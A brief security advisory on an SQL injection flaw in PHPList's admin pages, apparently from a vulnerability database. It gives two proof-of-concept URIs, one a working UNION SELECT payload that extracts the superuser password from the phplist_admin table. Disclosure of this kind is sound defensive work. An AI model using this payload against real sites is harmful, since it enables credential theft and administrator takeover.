• info
• discussion
• exploit
• solution
• references

PHPList Admin Page SQL Injection Vulnerability

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/public_html/lists/admin/?page=admin&id=INJECT HERE
http://www.example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password